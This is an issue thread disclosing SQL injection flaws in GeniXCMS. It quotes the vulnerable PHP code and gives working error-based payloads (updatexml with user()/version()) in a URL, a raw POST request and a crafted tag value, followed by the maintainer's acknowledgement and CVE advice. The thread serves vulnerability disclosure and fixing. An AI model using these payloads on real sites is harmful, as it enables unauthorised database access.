[sql injection]

[l3m0n]

[sql injection]

1. issue1:

   /inc/lib/Control/Backend/posts.control.php

   $data['post'] = Db::result("SELECT * FROM `posts` WHERE `id` = '{$_GET['id']}' ");
   

   exp1:

   http://lemon.love/code-src/GeniXCMS/GeniXCMS-master/gxadmin/index.php?page=posts&act=edit&id=6' and updatexml(1,(select user()),1)%23&token=Pp52R3oD4wuLBVutgD9hMsMrp8alQD3bKmuf06AI0HZMzoMiRe3s18BUa4eIOqrMqj38Cp9aoQqWaw10
   

2. issue2:

   /inc/mod/newsletter/options.php

   $usr = Db::result("SELECT * FROM `user` WHERE `group` = '{$_POST['recipient']}'");
   

   exp2:

   POST /code-src/GeniXCMS/GeniXCMS-master/gxadmin/index.php?page=mods&mod=newsletter HTTP/1.1
   Host: lemon.love
   User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:50.0) Gecko/20100101 Firefox/50.0
   Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
   Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
   Accept-Encoding: gzip, deflate
   Referer: http://lemon.love/code-src/GeniXCMS/GeniXCMS-master/gxadmin/index.php?page=mods&mod=newsletter
   Cookie: GeniXCMS-I3YZLgqlM9CM33Zi6PBF=f0d4ea594sg6i85ovsgeeg4um1; USER_NAME_COOKIE=admin; SID_1=95aefa9c; GeniXCMS-I3YZLgqlM9CM33Zi6PBF=f0d4ea594sg6i85ovsgeeg4um1; GeniXCMS-Installation=bscpujchn91pl57oj10af4vb45; GeniXCMS-vMIHkJPDSgZrrg3uywYO=48a5t0i0d7bqh4q3toepkckf37
   Connection: close
   Upgrade-Insecure-Requests: 1
   Content-Type: application/x-www-form-urlencoded
   Content-Length: 193
   
   subject=aaa%40qq.com&recipient=a'+and+updatexml(1,(select+version()),1)%23&type=text&token=x972PTSsrW9U5tCdFGTuRpgsNewA0Ozm3UTaPsh9ixhA3R0O25cRE7FCK3xlyEttm4EUGJXfgb3cCs3H&sendmail=&message=aaa
   

[l3m0n]

I found some unsafe method to cause a lot of problems.

I hope this helps you.

---

method issue

Db.class.php

Can see this in Db.class.php, You can see that escape is safe.
It is used in insert/update etc. But it is not used in select.

    public static function escape($vars)
    {
        if (DB_DRIVER == 'mysql') {
            $vars = mysql_escape_string($vars);

This program will generally use Typo::cleanX to deal with $_POST\$_GET

Typo.class.php

    public static function cleanX($c)
    {
        $val = self::strip_tags_content($c, '<script>', true);
        $val = htmlspecialchars(
            $val,
            ENT_QUOTES | ENT_HTML5,
            'utf-8'
        );
        return $val;
    }

It encodes the HTML character, But \ is not processed. So I can use \ to inject

function.htmlspecialchars

issue1

Tags.class.php

    public static function exist($tag)
    {
        $tag = Typo::cleanX($tag);
        $sql = "SELECT `name` FROM `cat` WHERE `name` = '{$tag}' OR `slug` = '{$tag}' AND `type` = 'tag'";
        $q = Db::result($sql);
        // echo Db::$num_rows;
        if (Db::$num_rows > 0) {
            return true;
        } else {
            return false;
        }
    }

if $tag = and updatexml(1,(select version()),1)#\

SELECT `name` FROM `cat` WHERE `name` = 'and updatexml(1,(select version()),1)#\' OR `slug` = 'and updatexml(1,(select version()),1)#\' AND `type` = 'tag'

it look like this:

SELECT `name` FROM `cat` WHERE `name` = 'xx' and updatexml(1,(select version()),1);

issue2

Db.class.php

    public static function insert($vars)
    {
        if (is_array($vars)) {
            $set = '';
            $k = '';
            foreach ($vars['key'] as $key => $val) {
                $val = self::escape($val);
                $set .= "'{$val}',";
                $k .= "`{$key}`,";
            }

            $set = substr($set, 0, -1);
            $k = substr($k, 0, -1);

            $sql = sprintf('INSERT INTO `%s` (%s) VALUES (%s) ', $vars['table'], $k, $set);
        } else {
            $sql = $vars;
        }
        if (DB_DRIVER == 'mysql') {
            mysql_query('SET CHARACTER SET utf8');
            $q = mysql_query($sql) or die(mysql_error());
            self::$last_id = mysql_insert_id();

here :

if (is_array($vars)) {
} else {
            $sql = $vars;
}

when $vars not is an array. This will cause security problems. Because $val = self::escape($val); cann't to exec.

Example:

/inc/lib/Control/Backend/categories.control.php

if (User::access(1)) {
    $data['sitetitle'] = CATEGORIES;
    switch (isset($_POST['addcat'])) {
        case true:
            // cleanup first
            $slug = Typo::slugify(Typo::cleanX($_POST['cat']));
            $cat = Typo::cleanX($_POST['cat']);

            if (!isset($_POST['token']) || !Token::isExist($_POST['token'])) {
                // VALIDATE ALL
                $alertDanger[] = TOKEN_NOT_EXIST;
            }
            if (!isset($_POST['cat']) || $_POST['cat'] == '') {
                $alertDanger[] = CATEGORY_CANNOT_EMPTY;
            }
            if (isset($alertDanger)) {
                $data['alertDanger'] = $alertDanger;
            } else {
                $cat = Db::insert(
                    sprintf(
                        "INSERT INTO `cat` VALUES (null, '%s', '%s', '%d', '', 'post' )",
                        $cat,
                        $slug,
                        Typo::int($_POST['parent'])
                    )
                );
                //print_r($cat);
                $data['alertSuccess'][] = MSG_CATEGORY_ADDED.' '.$_POST['cat'];
            }
            if (isset($_POST['token'])) {
                Token::remove($_POST['token']);
            }
            break;

        default:
            break;
    }

here have safe issue:

                $cat = Db::insert(
                    sprintf(
                        "INSERT INTO `cat` VALUES (null, '%s', '%s', '%d', '', 'post' )",
                        $cat,
                        $slug,
                        Typo::int($_POST['parent'])
                    )
                );

Of course, update also has this problem.

[l3m0n]

I would like to apply for cve-id, I really hope you can help me.T

[attritionorg]

First, make sure the issues are legitimate and the vendor has verified them. If they are issues, then you or the vendor can request IDs from https://cveform.mitre.org/.

[TuuuNya]

@l3m0n master really handsome

[semplon]

Hello @l3m0n, thanks again for introducing the issues. I'm very excited to know the issues so I can improve GeniXCMS.
[sql injection]
part 1:
About the sql injection part 1. I'm aware that and already do optimize about the query, and will upload upon next commit.

part 2:
thanks for reporting this, this modules hadn't in touch for a long time since i was focusing on the features. I will fix this issue.

Method Issues

Issue 1
Thank You for bringing this issue, I'll fix it soon.

Issue 2
About this, I'll considerate as not issue. This operational still exist for Backward Compatibility for oldest mods and application i create with old GeniXCMS. That's why before we assign the SQL value to $vars it had to cleaned up first. And thank You for remembering me about this, because in the future this operation will be removed and replaced with the array version.

and yes as @attritionorg mention, for CVE please ask at their website. Just fill in what is necessary.

Once again, thank you for your kindly report.
this is more awesome to know that i can improve to GeniXCMS.